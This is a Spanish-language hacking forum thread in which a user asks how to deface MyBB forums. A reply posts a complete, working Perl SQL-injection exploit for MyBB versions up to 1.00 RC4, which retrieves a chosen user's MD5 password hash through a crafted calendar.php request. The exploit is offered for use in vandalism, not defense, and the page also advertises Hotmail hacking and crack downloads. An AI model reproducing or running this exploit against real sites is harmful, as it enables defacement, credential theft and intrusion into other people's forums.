hacker


Ingresar con nombre de usuario, contraseña y duración de la sesión
| Portal Hacker | Editorial | Descargas | Ezine |
Inicio Ayuda Ingresar Registrarse
07 de Octubre de 2008, 09:04:04
Noticias: ¿No te llega el email de confirmacion?
Para ver este enlace Registrate o Inicia Sesion
> leer aqui

+  Foros pOrtal Hacker
|-+  Hacktivismo
| |-+  Hacking (Moderadores: askatasun, HolyKnight, kamui23, ..::Lëssiëm Táralóm::.., - TuX -)
| | |-+  Deface/Hack Mybb
0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Deface/Hack Mybb  (Leído 334 veces)
00001111
Recien llegado
*
Desconectado Desconectado

Mensajes: 1


Ver Perfil
« : 13 de Agosto de 2007, 12:45:29 »

¿ Que tal ?
Precisaria un manual sobre como defacear algun foro Mybb, los cuales estan muy completos de "bugs" .
Espero una respuesta rapida y efectiva.
Muchas gracias de antemano.
Saludos.

00001111 desde Argentina.
En línea
vart001
Administrador
*****
Desconectado Desconectado

Mensajes: 1,413


El Mero, mero!


Ver Perfil WWW
« Respuesta #1 : 13 de Agosto de 2007, 02:03:24 »

Estan repletos de bugs..
exelente, solo falta el detalle..

Cuales son los bugs, en que consisten, nadie se tomara la molestia de investigar pot ti..!

Cuando tengas los datos, como el bug y el exploit no dudes en publicarlo!

 cool
En línea

root from cph


Para ver este enlace Registrate o Inicia Sesion
Hackear hotmail aqui

piojo_tem
Visitante
« Respuesta #2 : 13 de Agosto de 2007, 04:32:28 »

desde Argentina.

Yo tambien soy de ahi Cheesy..



Con respecto a lo de la duda,

Código:
#!/usr/bin/perl -w
#
# SQL Injection Exploit for MyBulletinBoard (MyBB) <= 1.00 RC4
# This exploit show the MD5 crypted password of the user id you've chose
# Related advisory:
# Patch: http://www.mybboard.com/community/showthread.php?tid=2559
# http://fain182.badroot.org
# http://www.codebug.org
# Discovered by Alberto Trivero and coded with FAiN182

use LWP::Simple;

print "\n\t===========================================\n";
print "\t= Exploit for MyBulletinBoard <= 1.00 RC4 =\n";
print "\t= Alberto Trivero & FAiN182 - codebug.org =\n";
print "\t===========================================\n\n";

if(!$ARGV[0] or !$ARGV[1]) {
   print "Usage:\nperl $0 [full_target_path] [user_id]\n\nExample:\nperl $0 http://www.example.com/mybb/ 1\n";
   exit(0);
}

$url = "calendar.php?action=event&eid='%20UNION%20SELECT%20uid,uid,null,null,null,null,password,null%20FROM%20mybb_users%20WHERE%20uid=$ARGV[1]/*";
$page = get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page =~ m/<td><strong>(.*?)<\/strong>/ && print "[+] User ID is: $1\n";
print "[-] Unable to retrieve User ID\n" if(!$1);
$page =~ m/<a href="member\.php\?action=profile&uid=">(.*?)<\/a>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);


Te lo busque solo por ser argentino xD.. igual, cuando desees datos sobre exploits y vulns.. anda a
Para ver este enlace Registrate o Inicia Sesion y ahi hay cosas.

Si no te sirve ese exploit hace como te dije

Salut

En línea
alexisg_2007
NZ2
**
Desconectado Desconectado

Mensajes: 119

www.death-crack.net


Ver Perfil WWW
« Respuesta #3 : 14 de Agosto de 2007, 04:01:24 »

jeje y el manual ... lo tendras que ir haciendo tu con toda la info que hay aqui... mybb como ya dijeron contiene bastantes vulnerabilidad es ... la web de security focus te puede guiar hacia ellas  y darte una ayuda sobre el exploit y su vulneravilidad ...
En línea


**Quieres Descargas Directas? Buscas un programa?**


Para ver este enlace Registrate o Inicia Sesion
Death-Crack.net
Páginas: [1] Ir Arriba Imprimir 
« anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC hacker

Juegos gratis - Articulos PHP - Juegos - Trucos - Letras - Juegos - Juegos Online